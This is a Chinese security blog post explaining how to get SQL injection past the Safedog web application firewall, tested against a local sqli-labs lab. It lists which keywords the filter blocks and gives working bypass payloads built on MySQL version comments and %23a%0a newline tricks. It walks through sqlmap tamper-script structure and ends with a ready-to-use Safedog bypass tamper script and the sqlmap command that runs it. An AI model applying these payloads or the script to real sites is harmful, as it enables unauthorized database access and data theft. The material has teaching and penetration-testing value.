<!DOCTYPE html>
<html lang=zh>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
    <meta name="description" content="文章目录 0x00 简述 0x01 首先我们要判断哪个关键字被拦截了 0x02 一些简单的知识点 0x03 总结安全狗拦截的点 0x04 Sqlmap tamper的编写 0x05 tamper主要的三个部分 0x06 tamper编写测试方法 0x07 结束  0x00 简述 安全狗这些waf都是有一个特性，都是基于正则匹配去过滤的 但是实际情况是需要权衡可用性和安全性 当然厂商肯定是考">
<meta property="og:type" content="article">
<meta property="og:title" content="从绕过安全狗到编写tamper脚本">
<meta property="og:url" content="https://godzeo.github.io/2020/04/21/%E4%BB%8E%E7%BB%95%E8%BF%87%E5%AE%89%E5%85%A8%E7%8B%97%E5%88%B0%E7%BC%96%E5%86%99tamper%E8%84%9A%E6%9C%AC/index.html">
<meta property="og:site_name" content="Zeo 安全实验室">
<meta property="og:description" content="文章目录 0x00 简述 0x01 首先我们要判断哪个关键字被拦截了 0x02 一些简单的知识点 0x03 总结安全狗拦截的点 0x04 Sqlmap tamper的编写 0x05 tamper主要的三个部分 0x06 tamper编写测试方法 0x07 结束  0x00 简述 安全狗这些waf都是有一个特性，都是基于正则匹配去过滤的 但是实际情况是需要权衡可用性和安全性 当然厂商肯定是考">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200421092204127.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2dvZF96elo=,size_16,color_FFFFFF,t_70">
<meta property="article:published_time" content="2020-04-21T01:23:23.000Z">
<meta property="article:modified_time" content="2020-08-31T15:02:29.350Z">
<meta property="article:author" content="Zeo">
<meta property="article:tag" content="WEB安全">
<meta property="article:tag" content="代码审计">
<meta property="article:tag" content="内网">
<meta property="article:tag" content="渗透">
<meta property="article:tag" content="二进制">
<meta property="article:tag" content="CTF">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://img-blog.csdnimg.cn/20200421092204127.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2dvZF96elo=,size_16,color_FFFFFF,t_70">
    
    
        
          
              <link rel="shortcut icon" href="/images/favicon.ico">
          
        
        
          
            <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
          
        
        
          
            <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
          
        
    
    <!-- title -->
    <title>从绕过安全狗到编写tamper脚本</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
      
<link rel="stylesheet" href="/css/rtl.css">

    
    <!-- rss -->
    
    
      <link rel="alternate" href="/true" title="Zeo 安全实验室" type="application/atom+xml" />
    
<meta name="generator" content="Hexo 4.2.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/about/">关于</a></li>
         
          <li><a href="/archives/">归档</a></li>
         
          <li><a href="/categories">分类</a></li>
         
          <li><a href="/projects_url">项目</a></li>
         
          <li><a href="/search/">搜索</a></li>
        
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" href="/2020/04/24/%E4%B8%80%E5%8F%A5%E8%AF%9D%E4%B8%8B%E8%BD%BDpayload%EF%BC%88%E6%8C%81%E7%BB%AD%E6%9B%B4%E6%96%B0%EF%BC%89/"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" href="/2020/04/21/%E7%AE%80%E5%8D%95%E7%9A%84%E4%BB%8E%E7%BB%95%E7%8B%97%E5%88%B0%E7%BC%96%E5%86%99tamper/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">上一篇</span>
      <span id="i-next" class="info" style="display:none;">下一篇</span>
      <span id="i-top" class="info" style="display:none;">返回顶部</span>
      <span id="i-share" class="info" style="display:none;">分享文章</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=https://godzeo.github.io/2020/04/21/%E4%BB%8E%E7%BB%95%E8%BF%87%E5%AE%89%E5%85%A8%E7%8B%97%E5%88%B0%E7%BC%96%E5%86%99tamper%E8%84%9A%E6%9C%AC/" target="_blank" rel="noopener"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=https://godzeo.github.io/2020/04/21/%E4%BB%8E%E7%BB%95%E8%BF%87%E5%AE%89%E5%85%A8%E7%8B%97%E5%88%B0%E7%BC%96%E5%86%99tamper%E8%84%9A%E6%9C%AC/&text=从绕过安全狗到编写tamper脚本" target="_blank" rel="noopener"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=https://godzeo.github.io/2020/04/21/%E4%BB%8E%E7%BB%95%E8%BF%87%E5%AE%89%E5%85%A8%E7%8B%97%E5%88%B0%E7%BC%96%E5%86%99tamper%E8%84%9A%E6%9C%AC/&title=从绕过安全狗到编写tamper脚本" target="_blank" rel="noopener"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=https://godzeo.github.io/2020/04/21/%E4%BB%8E%E7%BB%95%E8%BF%87%E5%AE%89%E5%85%A8%E7%8B%97%E5%88%B0%E7%BC%96%E5%86%99tamper%E8%84%9A%E6%9C%AC/&is_video=false&description=从绕过安全狗到编写tamper脚本" target="_blank" rel="noopener"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=从绕过安全狗到编写tamper脚本&body=Check out this article: https://godzeo.github.io/2020/04/21/%E4%BB%8E%E7%BB%95%E8%BF%87%E5%AE%89%E5%85%A8%E7%8B%97%E5%88%B0%E7%BC%96%E5%86%99tamper%E8%84%9A%E6%9C%AC/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=https://godzeo.github.io/2020/04/21/%E4%BB%8E%E7%BB%95%E8%BF%87%E5%AE%89%E5%85%A8%E7%8B%97%E5%88%B0%E7%BC%96%E5%86%99tamper%E8%84%9A%E6%9C%AC/&title=从绕过安全狗到编写tamper脚本" target="_blank" rel="noopener"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=https://godzeo.github.io/2020/04/21/%E4%BB%8E%E7%BB%95%E8%BF%87%E5%AE%89%E5%85%A8%E7%8B%97%E5%88%B0%E7%BC%96%E5%86%99tamper%E8%84%9A%E6%9C%AC/&title=从绕过安全狗到编写tamper脚本" target="_blank" rel="noopener"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=https://godzeo.github.io/2020/04/21/%E4%BB%8E%E7%BB%95%E8%BF%87%E5%AE%89%E5%85%A8%E7%8B%97%E5%88%B0%E7%BC%96%E5%86%99tamper%E8%84%9A%E6%9C%AC/&title=从绕过安全狗到编写tamper脚本" target="_blank" rel="noopener"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=https://godzeo.github.io/2020/04/21/%E4%BB%8E%E7%BB%95%E8%BF%87%E5%AE%89%E5%85%A8%E7%8B%97%E5%88%B0%E7%BC%96%E5%86%99tamper%E8%84%9A%E6%9C%AC/&title=从绕过安全狗到编写tamper脚本" target="_blank" rel="noopener"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=https://godzeo.github.io/2020/04/21/%E4%BB%8E%E7%BB%95%E8%BF%87%E5%AE%89%E5%85%A8%E7%8B%97%E5%88%B0%E7%BC%96%E5%86%99tamper%E8%84%9A%E6%9C%AC/&name=从绕过安全狗到编写tamper脚本&description=" target="_blank" rel="noopener"><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://news.ycombinator.com/submitlink?u=https://godzeo.github.io/2020/04/21/%E4%BB%8E%E7%BB%95%E8%BF%87%E5%AE%89%E5%85%A8%E7%8B%97%E5%88%B0%E7%BC%96%E5%86%99tamper%E8%84%9A%E6%9C%AC/&t=从绕过安全狗到编写tamper脚本" target="_blank" rel="noopener"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#文章目录"><span class="toc-number">1.</span> <span class="toc-text">文章目录</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x00-简述"><span class="toc-number"></span> <span class="toc-text">0x00 简述</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x01-首先我们要判断哪个关键字被拦截了"><span class="toc-number"></span> <span class="toc-text">0x01 首先我们要判断哪个关键字被拦截了</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x02-一些简单的知识点"><span class="toc-number"></span> <span class="toc-text">0x02 一些简单的知识点</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x03-总结安全狗拦截的点"><span class="toc-number"></span> <span class="toc-text">0x03 总结安全狗拦截的点</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x04-Sqlmap-tamper的编写"><span class="toc-number"></span> <span class="toc-text">0x04 Sqlmap tamper的编写</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x05-tamper主要的三个部分"><span class="toc-number"></span> <span class="toc-text">0x05 tamper主要的三个部分</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x06-tamper编写测试方法"><span class="toc-number"></span> <span class="toc-text">0x06 tamper编写测试方法</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x07-结束"><span class="toc-number"></span> <span class="toc-text">0x07 结束</span></a>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        从绕过安全狗到编写tamper脚本
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">Zeo 安全实验室</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2020-04-21T01:23:23.000Z" itemprop="datePublished">2020-04-21</time>
        
      
    </div>


      
    <div class="article-category">
        <i class="fas fa-archive"></i>
        <a class="category-link" href="/categories/WEB%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E5%92%8C%E5%88%86%E6%9E%90/">WEB漏洞复现和分析</a>
    </div>


      

    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <a id="more"></a>



<h3 id="文章目录"><a href="#文章目录" class="headerlink" title="文章目录"></a>文章目录</h3><ul>
<li><a href="#0x00__4">0x00 简述</a></li>
<li><a href="#0x01__21">0x01 首先我们要判断哪个关键字被拦截了</a></li>
<li><a href="#0x02__44">0x02 一些简单的知识点</a></li>
<li><a href="#0x03__95">0x03 总结安全狗拦截的点</a></li>
<li><a href="#0x04_Sqlmap_tamper_150">0x04 Sqlmap tamper的编写</a></li>
<li><a href="#0x05_tamper_229">0x05 tamper主要的三个部分</a></li>
<li><a href="#0x06_tamper_279">0x06 tamper编写测试方法</a></li>
<li><a href="#0x07__306">0x07 结束</a></li>
</ul>
<h1 id="0x00-简述"><a href="#0x00-简述" class="headerlink" title="0x00 简述"></a>0x00 简述</h1><ul>
<li>安全狗这些waf都是有一个特性，都是基于正则匹配去过滤的</li>
<li>但是实际情况是需要权衡可用性和安全性</li>
<li>当然厂商肯定是考虑到用户体验，所以不能出现什么东西都拦截</li>
<li>所以最终就是正则的绕过</li>
<li>注意：</li>
<li>版本不同，他的正则规则也是不一样的</li>
<li>所以有的payload在新老版本是不能同吃。</li>
<li>但是没有关系，你学会这么绕，这都不是问题。</li>
</ul>
<h1 id="0x01-首先我们要判断哪个关键字被拦截了"><a href="#0x01-首先我们要判断哪个关键字被拦截了" class="headerlink" title="0x01 首先我们要判断哪个关键字被拦截了"></a>0x01 首先我们要判断哪个关键字被拦截了</h1><p>我们以 order by 3 这个简单的语句为例子</p>
<p>提供思路就是破坏单词去测试：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;10.211.55.4&#x2F;Less-2&#x2F;?id&#x3D;1 order by 3  （拦截）</span><br><span class="line"></span><br><span class="line">http:&#x2F;&#x2F;10.211.55.4&#x2F;Less-2&#x2F;?id&#x3D;1 ordwer by 3 （破坏了order 没有拦截）</span><br><span class="line"></span><br><span class="line">http:&#x2F;&#x2F;10.211.55.4&#x2F;Less-2&#x2F;?id&#x3D;1 order bay 3 （破坏了by 没有拦截）</span><br></pre></td></tr></table></figure>

<p>所以狗拦截的东西就是 order by 两个一起出现</p>
<p>所有后面的测试都是按照这个思路初步的判断。</p>
<h1 id="0x02-一些简单的知识点"><a href="#0x02-一些简单的知识点" class="headerlink" title="0x02 一些简单的知识点"></a>0x02 一些简单的知识点</h1><ul>
<li>绕过的一些基础</li>
<li>MySql注释内语句也可执行（/*! */）</li>
<li><code>/*! ....*/</code> 在其他很多地方都是注释。</li>
<li>但是在mysql中不是注释，mysql为了保持兼容，它把一些特有的仅在mysql上用的语句放在<code>/*!....*/</code>中，这样这些语句如果在其他数据库中是不会被执行，但在mysql中它会执行。</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#x2F;*!50001 select * from test *&#x2F;;</span><br></pre></td></tr></table></figure>

<p>这里的50001表示假如 数据库是5.00.01以上版本，该语句才会被执行，基本上只做一个版本的判断。</p>
<ul>
<li>Mysql常用的符号</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">换行符号</span><br><span class="line">%0a</span><br><span class="line"></span><br><span class="line">注释符合</span><br><span class="line">%23</span><br><span class="line"></span><br><span class="line">空白字符</span><br><span class="line">&quot;%0a&quot;, &quot;%0b&quot;, &quot;%0c&quot;, &quot;%0d&quot;, &quot;%0e&quot;, &quot;%0f&quot;, &quot;%0g&quot;, &quot;%0h&quot;, &quot;%0i&quot;, &quot;%0j&quot;</span><br><span class="line"></span><br><span class="line">不同的数据库不太一样，可以自己查一下</span><br></pre></td></tr></table></figure>

<p>还有一些bypass的常用注释符号</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">#</span><br><span class="line">--</span><br><span class="line">-- -</span><br><span class="line">--+</span><br><span class="line">&#x2F;&#x2F;</span><br><span class="line">&#x2F;**&#x2F;</span><br><span class="line">&#x2F;*letmetest*&#x2F;</span><br><span class="line">;%00</span><br></pre></td></tr></table></figure>

<h1 id="0x03-总结安全狗拦截的点"><a href="#0x03-总结安全狗拦截的点" class="headerlink" title="0x03 总结安全狗拦截的点"></a>0x03 总结安全狗拦截的点</h1><ul>
<li>and 1</li>
<li>只要and后面接数字，安全狗就会拦截</li>
<li>order by</li>
<li>order 后面接by，安全狗就会拦截</li>
<li>union select</li>
<li>只要union select 结合就被拦截,实测发现还是对select这个词的更加严格，主要饶select</li>
<li>database()</li>
<li>database后面接括号，安全狗就会拦截</li>
</ul>
<p>下面是测试成功的例子</p>
<p>order by 绕过</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">测试 order aby不拦截 ，我们让 by前面的注释掉就可以绕过</span><br><span class="line"></span><br><span class="line">http:&#x2F;&#x2F;10.211.55.4&#x2F;Less-2&#x2F;?id&#x3D;1 order %23a%0aby 3</span><br></pre></td></tr></table></figure>

<p>union select绕过 同理</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;10.211.55.4&#x2F;Less-2&#x2F;?id&#x3D;-1 union %23a%0a&#x2F;*!select*&#x2F; 1,2,3</span><br></pre></td></tr></table></figure>

<p>database()绕过</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;10.211.55.4&#x2F;Less-2&#x2F;?id&#x3D;-1 union %23a%0a&#x2F;*!select*&#x2F; 1,%23a%0adatabase&#x2F;*!*&#x2F;(),3</span><br></pre></td></tr></table></figure>

<p>一个完整的union查询</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;10.211.55.4&#x2F;Less-2&#x2F;?id&#x3D;-1 union %23a%0a&#x2F;*!select*&#x2F; 1,group_concat(table_name),3 %23a%0a&#x2F;*!from*&#x2F; information_schema.tables where table_schema&#x3D;&#39;security&#39;</span><br></pre></td></tr></table></figure>

<p>还有一种注释版本号的 绕过</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;10.211.55.4&#x2F;Less-2&#x2F;?id&#x3D;-1 union &#x2F;*!44466select*&#x2F; 1,database&#x2F;*!()*&#x2F;,3</span><br></pre></td></tr></table></figure>

<h1 id="0x04-Sqlmap-tamper的编写"><a href="#0x04-Sqlmap-tamper的编写" class="headerlink" title="0x04 Sqlmap tamper的编写"></a>0x04 Sqlmap tamper的编写</h1><p>tamper是sqlmap对其进行扩展的一系列脚本，主要功能是对本来的payload进行特定的更改以绕过waf。</p>
<p>为了好理解直接典例深刨析：</p>
<p>我们理解一下一个常用的tamper ：space2comment.py</p>
<p>这个脚本的功能就是：用“/**/”替换空格符</p>
<p>下面是完整的代码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br></pre></td><td class="code"><pre><span class="line">#!&#x2F;usr&#x2F;bin&#x2F;env python</span><br><span class="line"></span><br><span class="line">&quot;&quot;&quot;</span><br><span class="line">Copyright (c) 2006-2020 sqlmap developers (http:&#x2F;&#x2F;sqlmap.org&#x2F;)</span><br><span class="line">See the file &#39;LICENSE&#39; for copying permission</span><br><span class="line">&quot;&quot;&quot;</span><br><span class="line"></span><br><span class="line">from lib.core.compat import xrange</span><br><span class="line">from lib.core.enums import PRIORITY</span><br><span class="line"></span><br><span class="line">__priority__ &#x3D; PRIORITY.LOW</span><br><span class="line"></span><br><span class="line">def dependencies():</span><br><span class="line">    pass</span><br><span class="line"></span><br><span class="line">def tamper(payload, **kwargs):</span><br><span class="line">    &quot;&quot;&quot;</span><br><span class="line">    Replaces space character (&#39; &#39;) with comments &#39;&#x2F;**&#x2F;&#39;</span><br><span class="line"></span><br><span class="line">    Tested against:</span><br><span class="line">        * Microsoft SQL Server 2005</span><br><span class="line">        * MySQL 4, 5.0 and 5.5</span><br><span class="line">        * Oracle 10g</span><br><span class="line">        * PostgreSQL 8.3, 8.4, 9.0</span><br><span class="line"></span><br><span class="line">    Notes:</span><br><span class="line">        * Useful to bypass weak and bespoke web application firewalls</span><br><span class="line"></span><br><span class="line">    &gt;&gt;&gt; tamper(&#39;SELECT id FROM users&#39;)</span><br><span class="line">    &#39;SELECT&#x2F;**&#x2F;id&#x2F;**&#x2F;FROM&#x2F;**&#x2F;users&#39;</span><br><span class="line">    &quot;&quot;&quot;</span><br><span class="line"></span><br><span class="line">    retVal &#x3D; payload</span><br><span class="line"></span><br><span class="line">    if payload:</span><br><span class="line">        retVal &#x3D; &quot;&quot;</span><br><span class="line">        quote, doublequote, firstspace &#x3D; False, False, False</span><br><span class="line"></span><br><span class="line">        for i in xrange(len(payload)):</span><br><span class="line">            if not firstspace:</span><br><span class="line">                if payload[i].isspace():</span><br><span class="line">                    firstspace &#x3D; True</span><br><span class="line">                    retVal +&#x3D; &quot;&#x2F;**&#x2F;&quot;</span><br><span class="line">                    continue</span><br><span class="line"></span><br><span class="line">            elif payload[i] &#x3D;&#x3D; &#39;\&#39;&#39;:</span><br><span class="line">                quote &#x3D; not quote</span><br><span class="line"></span><br><span class="line">            elif payload[i] &#x3D;&#x3D; &#39;&quot;&#39;:</span><br><span class="line">                doublequote &#x3D; not doublequote</span><br><span class="line"></span><br><span class="line">            elif payload[i] &#x3D;&#x3D; &quot; &quot; and not doublequote and not quote:</span><br><span class="line">                retVal +&#x3D; &quot;&#x2F;**&#x2F;&quot;</span><br><span class="line">                continue</span><br><span class="line"></span><br><span class="line">            retVal +&#x3D; payload[i]</span><br><span class="line"></span><br><span class="line">    return retVal</span><br></pre></td></tr></table></figure>

<p>​</p>
<h1 id="0x05-tamper主要的三个部分"><a href="#0x05-tamper主要的三个部分" class="headerlink" title="0x05 tamper主要的三个部分"></a>0x05 tamper主要的三个部分</h1><ul>
<li>第一部分priority</li>
<li>定义脚本的优先级，用于有多个tamper脚本的先后顺序</li>
<li>第二部分dependencies函数</li>
<li>该脚本适用/不适用的范围，也可以不写。</li>
<li>第三部分tamper函数</li>
<li>主要就是我们绕过的精华，要替换的内容。</li>
</ul>
<p>priority优先级</p>
<p>使用了多个tamper时，PRIORITY的参数等级较高的tamper先使用</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">__priority__ &#x3D; PRIORITY.LOW</span><br></pre></td></tr></table></figure>

<p>有大概七个等级 LOWEST LOWER = LOW NORMAL HIGH HIGHER HIGHEST</p>
<p>dependencies函数主要是提示用户适用范围</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">上文中没写，就是没有提示，你要自己知道，其实不写也行就直接pass</span><br><span class="line">def dependencies():</span><br><span class="line">     singleTimeWarnMessage(&quot;这里输入想显示的内容“)</span><br></pre></td></tr></table></figure>

<p>tamper是重头戏</p>
<p>这是一个简单的双写绕过，tamper里面主要是一个替换的过程</p>
<p>payload就是那些关键词select union这下，经过替换只有return 回去，就是处理好的</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">def tamper(payload, **kwargs):</span><br><span class="line">    return payload.replace(&#39;union&#39;,&#39;uniounionn&#39;)</span><br></pre></td></tr></table></figure>

<p>所以中间具体怎么替换就是你的事情了。只有最后return回去就好了</p>
<h1 id="0x06-tamper编写测试方法"><a href="#0x06-tamper编写测试方法" class="headerlink" title="0x06 tamper编写测试方法"></a>0x06 tamper编写测试方法</h1><p>这里我说下几个坑点：</p>
<ul>
<li><p>手工过和写tamper不一样，sqlmap的语句和你用的并不一样</p>
</li>
<li><p>我有两个建议，一个是用slqmap 挂代理到burp去看到底可以不，我没用这个方法，点的有点累</p>
</li>
<li><p>我是打开 -v 参数，去看payload和提示，看哪里断开，复制payload去手工看看，绕过编写一下tamper</p>
</li>
<li><p>还有调试过程中 要打开–flush 参数刷新缓存</p>
</li>
<li><p>还有一个就是你的python代码能力了，如果你只是用简单的replace(）函数，就要注意替换的顺序，</p>
<ul>
<li>例如会用到的相似的函数：</li>
</ul>
</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">SESSION_USER()  CURRENT_USER()  USER() </span><br><span class="line">这几个都有 user（） 如果你在最前面 替换了user（） </span><br><span class="line">那么后面就会出现CURRENT_%23a%0aUSER&#x2F;*!*&#x2F;() 我这种绕过就不兼容了</span><br><span class="line">得在后面再自己调整</span><br></pre></td></tr></table></figure>

<ul>
<li>下面是我的绕过参数：</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python3 sqlmap.py -u &quot;http:&#x2F;&#x2F;10.211.55.4&#x2F;Less-2&#x2F;?id&#x3D;1&quot; --tamper dogz.py --random-agent --flush -v 3 --batch --dbms mysql --current-user –-tech&#x3D;U</span><br></pre></td></tr></table></figure>

<h1 id="0x07-结束"><a href="#0x07-结束" class="headerlink" title="0x07 结束"></a>0x07 结束</h1><p>绕狗脚本给大家，如果跑的时候失效了可以按照上面的方法修改修改就好了</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">#!&#x2F;usr&#x2F;bin&#x2F;python3.7</span><br><span class="line"># Author:Zeo</span><br><span class="line"></span><br><span class="line">from lib.core.enums import PRIORITY</span><br><span class="line">from lib.core.common import singleTimeWarnMessage</span><br><span class="line">from lib.core.enums import DBMS</span><br><span class="line">import os</span><br><span class="line"></span><br><span class="line">__priority__ &#x3D; PRIORITY.LOW</span><br><span class="line"></span><br><span class="line">def dependencies():</span><br><span class="line">    singleTimeWarnMessage(&quot;Zeo_bypass_safedog4.0&quot;)</span><br><span class="line">    </span><br><span class="line">def tamper(payload, **kwargs):</span><br><span class="line">    payload&#x3D;payload.replace(&#39;AND&#39;,&#39;&#x2F;*!44466AND*&#x2F;&#39;)</span><br><span class="line">    payload&#x3D;payload.replace(&#39;ORDER&#39;,&#39;&#x2F;*!44466order*&#x2F;&#39;)</span><br><span class="line">    payload&#x3D;payload.replace(&#39;BY&#39;,&#39;%23a%0aby&#39;)</span><br><span class="line">    payload&#x3D;payload.replace(&#39;USER()&#39;,&#39;%23a%0aUSER&#x2F;*!*&#x2F;()&#39;)</span><br><span class="line">    payload&#x3D;payload.replace(&#39;DATABASE()&#39;,&#39;%23a%0aDATABASE&#x2F;*!*&#x2F;()&#39;)</span><br><span class="line">    payload&#x3D;payload.replace(&#39;SESSION_%23a%0aUSER&#x2F;*!*&#x2F;()&#39;,&#39;%23a%0aSESSION_USER()&#39;)</span><br><span class="line">    payload&#x3D;payload.replace(&#39;UNION ALL SELECT&#39;,&#39;UNION ALL &#x2F;*!44466SELECT*&#x2F;&#39;)</span><br><span class="line">    payload&#x3D;payload.replace(&#39;CURRENT_%23a%0aUSER&#x2F;*!*&#x2F;()&#39;,&#39;CURRENT_USER()&#39;)</span><br><span class="line">    return payload</span><br></pre></td></tr></table></figure>

